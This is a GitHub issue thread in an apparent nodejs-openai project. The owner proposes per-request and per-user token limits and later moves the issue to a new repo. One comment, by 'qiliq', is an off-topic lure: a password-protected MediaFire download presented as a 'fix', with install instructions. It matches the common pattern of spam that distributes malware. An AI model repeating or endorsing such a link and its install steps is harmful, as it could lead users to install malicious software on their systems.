### ISSUE TITLE
Manage request token limit

### ISSUE THREAD

**Issue by justcabyr** [justcabyr/nodejs-openai#2]
Watch (or maybe don't) request tokens and set a limit for users - set a maximum token per request and set a total token per user

For large token requests, ask the user to upgrade tier, and when the total token is exceeded, tell the user to contact admin.

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by justcabyr** [comment]
Moved issue to new project repo.

**Comment by justcabyr** [comment]
Moved issue to new project repo.
